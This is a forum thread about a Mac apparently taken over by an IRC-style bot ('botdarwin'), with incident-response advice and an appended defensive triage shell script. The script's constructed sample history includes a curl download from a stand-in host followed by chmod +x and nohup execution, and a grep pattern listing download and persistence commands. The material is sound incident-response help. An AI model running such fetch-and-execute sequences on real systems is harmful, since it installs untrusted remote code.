1464 Views 9 Replies Latest reply: Dec 2, 2008 11:23 AM by edclange
austin m wrote:
I noticed today after being out of town for the holidays that my password was no longer working when trying to administer things... I ended up having to log in as root and reset the password for my other accounts.
I also noticed in moving through the Finder that in my home folder there was now an unnamed folder, and inside it is a folder named "botdarwin".
Upon checking my bash history I discovered that quite a few terminal commands had been run also.
Any of the terminal guys able to decipher exactly what they were trying to accomplish?
I have a screen shot of the folder structure as well as a list of terminal commands that were executed here:
I'm not sure what the attack vector was because other people have access to my computer. I'll be thoroughly quizzing them later today.
When you do find out who did this, perhaps it's time to stop letting other people use your computer and certainly never give them your administrator account password.
Clearly this is not a Leopard or OS problem, but one of a security breach on your part.
Prevention is the first step. Lock down your computer securely.
It's not a trojan bot, it's lack of security. The problem did not come in via the network, but via some user's fingers.
Message was edited by: nerowolfe
So after talking to the other user of my comp, they insist that they didn't download or install anything.
That said, I did have some ports open to the internet, but my router wasn't properly configured for them to be accessible from the internet. I had SSH, web sharing, print sharing, and remote management turned on. I know for a fact it wasn't accessible because I couldn't ssh in or VPN in whilst I was out of town.
I found this at darwin bots dot com
Darwinbots is an open source artificial life simulator which attempts to simulate artificial life and evolution. It simulates Von Neumann machines (and Von Neumann probes like the Monolith) better than it simulates biological life necessarily.
Darwinbots is an Artificial Life simulator that merges the gameplay of C-Robots type arena combat with adaptive asexual population dynamics.
Have you downloaded a game or something similar?
Is there anything interesting in the output of the "last" command (in Terminal)?
If it's an IRC bot, and it's still running, you might be able to figure out what IRC server and channel it's using with the "netstat -a" command in Terminal. This will show all of the established TCP connections on your machine.
If your intruder's trail is in your shell history, chances are there are other trails. Poke around in the Console application, or the files in /var/log.
There's a sendmail executable in your screen capture. This means that the bot has the capability of sending e-mail. That could be bad news.
Bottom line is, your machine has been compromised. You should wipe it clean and reinstall it from scratch.
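The triage steps suggested above (check `netstat -a` for established connections, read back through the shell history, look for the unnamed folder) can be scripted so the same checks are applied the same way on every account. The script below is an added example written for this page; it is not code from the thread or from any tool it mentions. It works on `netstat -an` style text and a saved history file rather than calling the live commands, so it runs offline; the netstat lines, history file, home directory and the `example.invalid` URL are all constructed sample data, and the IRC port range (6660-6669 and 6697) is an assumption about what "an IRC bot" would connect to.

```shell
#!/bin/sh
# Added triage helpers for the situation in this thread (changed password,
# unknown "botdarwin" folder, foreign commands in the shell history).
# Example code written for this page, not from the thread or any tool in it.
# All sample data below is CONSTRUCTED for illustration.

# 1. From `netstat -an` style output on stdin, print established TCP
#    connections whose remote port is in the classic IRC range
#    (6660-6669, 6697) as "local -> remote". Handles both the macOS
#    address form (host.port) and the Linux form (host:port).
irc_connections() {
    awk '$1 ~ /^tcp/ && $NF == "ESTABLISHED" {
        n = split($5, parts, /[.:]/)   # last piece after . or : is the port
        port = parts[n] + 0
        if ((port >= 6660 && port <= 6669) || port == 6697)
            print $4 " -> " $5
    }'
}

# 2. Print numbered history lines that deserve a second look after a
#    suspected compromise: downloads, mode changes, background launches,
#    persistence (cron, launchd) and changes to local accounts.
suspicious_history() {
    grep -nE 'curl|wget|chmod \+x|nohup|crontab|launchctl|passwd|dscl|rm -rf' "$1"
}

# 3. List directories under $1 whose names are empty or whitespace-only,
#    i.e. the "unnamed folder" the poster saw in the Finder.
unnamed_dirs() {
    find "$1" -mindepth 1 -type d | awk -F/ '$NF ~ /^[[:space:]]*$/'
}

# --- constructed samples (not real captures) -----------------------------
SAMPLE_NETSTAT='Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  10.0.0.5.49152         192.0.2.10.6667        ESTABLISHED
tcp4       0      0  10.0.0.5.49160         198.51.100.7.443       ESTABLISHED
tcp4       0      0  *.22                   *.*                    LISTEN
tcp        0      0 10.0.0.5:49170          203.0.113.9:6697       ESTABLISHED'

SAMPLE_HISTORY=$(mktemp)
SAMPLE_HOME=$(mktemp -d)
trap 'rm -rf "$SAMPLE_HISTORY" "$SAMPLE_HOME"' EXIT

cat > "$SAMPLE_HISTORY" <<'EOF'
ls -la
cd Documents
curl -O http://example.invalid/b.tgz
tar xzf b.tgz
chmod +x b/run.sh
nohup ./b/run.sh &
passwd
exit
EOF

# A directory literally named " " with "botdarwin" inside, plus a normal one.
mkdir -p "$SAMPLE_HOME/ /botdarwin" "$SAMPLE_HOME/Documents"

# Run with the argument "demo" to see the three reports on the sample data.
if [ "${1:-}" = "demo" ]; then
    echo "# IRC-range connections:";    printf '%s\n' "$SAMPLE_NETSTAT" | irc_connections
    echo "# Suspicious history lines:"; suspicious_history "$SAMPLE_HISTORY"
    echo "# Unnamed directories:";      unnamed_dirs "$SAMPLE_HOME"
fi
```

On a real machine you would feed `netstat -an | irc_connections`, `suspicious_history ~/.bash_history` and `unnamed_dirs ~` instead of the samples, and treat a hit in any of the three as a reason to preserve the disk image before doing the wipe and reinstall recommended above.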